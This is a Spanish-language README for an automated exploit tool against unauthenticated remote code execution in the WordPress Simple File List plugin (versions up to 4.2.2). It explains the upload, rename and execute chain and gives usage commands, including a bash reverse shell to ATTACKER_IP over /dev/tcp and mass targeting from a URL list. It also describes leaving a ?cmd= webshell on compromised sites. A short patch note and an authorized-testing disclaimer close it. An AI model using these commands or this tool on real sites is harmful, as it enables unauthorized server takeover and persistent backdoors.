
Exploit para CVE-2025-34085
Un exploit automatizado para CVE-2025-34085 (duplicado de CVE-2020-36847), una vulnerabilidad crítica de ejecución remota de código sin autenticación en el plugin WordPress Simple File List versiones ≤ 4.2.2.
Nota: CVE-2025-34085 fue rechazado por MITRE como duplicado de CVE-2020-36847. La vulnerabilidad es real y está parcheada en la versión 4.2.3. Ambos ID de CVE se refieren al mismo problema subyacente.
| Campo | Detalle |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Plugin | Simple File List |
| Versiones afectadas | ≤ 4.2.2 |
| Versión corregida | 4.2.3 |
| Tipo | Subida de archivos sin restricciones → Omisión de renombrado → RCE |
| CVSS | 9.8 (Crítico) |
| Autenticación | No requerida |
| Descubrimiento original | coiffeur |
| Módulo Metasploit | exploit/multi/http/wp_simple_file_list_rce |
Subir — Se sube un payload PHP disfrazado como archivo .png a través del endpoint de subida del plugin (ee-upload-engine.php). El motor de subida valida las extensiones pero acepta archivos de imagen.
Renombrar — La funcionalidad de renombrado del plugin (ee-file-engine.php) no impone restricciones de extensión. El atacante renombra el .png a .php (o .phtml, .php5, .php3).
Ejecutar — El archivo PHP renombrado ahora es accesible y ejecutable en el directorio de subidas en /wp-content/uploads/simple-file-list/, otorgando al atacante ejecución arbitraria de comandos.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd=)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Crea un archivo targets.txt con una URL por línea:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
Consejo: Usa
--inlinecuando necesites una reverse shell o cuando el objetivo tenga filtrado de parámetros de consulta. Sin--inline, el exploit deja una webshell que acepta comandos mediante?cmd=.
Los exploit exitosos se registran en vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt localmente — útil para tu informe--inline con una reverse shell para evitar dejar una webshell persistente con ?cmd=Actualiza el plugin Simple File List a la versión 4.2.3 o posterior.
Esta herramienta está diseñada únicamente para pruebas de penetración autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtén la autorización adecuada antes de realizar pruebas.
| Argumento | Descripción | Por defecto |
|---|
-u, --url | URL del objetivo individual | — |
--cmd | Comando a ejecutar en el objetivo | id |
--inline | Inyectar comando directamente en el shell PHP (hardcodeado, sin webshell ?cmd=) | False |